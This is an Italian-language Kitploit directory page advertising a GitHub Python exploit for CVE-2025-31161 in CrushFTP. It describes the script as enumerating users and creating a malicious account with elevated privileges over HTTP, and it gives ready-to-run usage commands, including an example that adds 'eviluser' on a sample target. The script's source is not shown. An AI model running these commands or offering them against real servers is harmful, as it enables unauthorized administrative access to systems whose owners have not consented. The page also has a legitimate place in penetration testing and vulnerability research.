Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-31161 — Script di exploit Python per CVE-2025-31161 che prende di mira CrushFTP. Enumera gli utenti e crea account dannosi con permessi elevati tramite richieste HTTP. | Kitploit
Strumenti/GitHubGitHub/ch3m1cl/cve-2025-31161
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubch3m1cl/cve-2025-31161

CVE-2025-31161

Script di exploit Python per CVE-2025-31161 che prende di mira CrushFTP. Enumera gli utenti e crea account dannosi con permessi elevati tramite richieste HTTP.

Vedi Repository
1129 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-31161 - Script di Exploit per CrushFTP

Python License


Descrizione

Questo repository contiene uno script Python per interagire con il servizio CrushFTP vulnerabile a CVE-2025-31161 Lo script consente di elencare gli utenti esistenti e di aggiungere un utente malevolo sfruttando la vulnerabilità.


Funzionalità

  • Controlla se l'host è attivo prima di eseguire i comandi.
  • Elenca gli utenti validi sul server CrushFTP.
  • Crea un utente malevolo con permessi elevati.
  • Gestione di base delle risposte HTTP e degli errori.

Requisiti

  • Python 3.10 o superiore
  • Modulo requests

Installa le dipendenze:

root@kitploit:~
pip install -r requirements.txt

Elenca utenti

root@kitploit:~
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>

Aggiungi Utente Malevolo

root@kitploit:~
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>

Esempi:

Elenca utenti su un target:

root@kitploit:~
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80

Aggiungi un utente malevolo:

root@kitploit:~
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234

Scarica lo strumento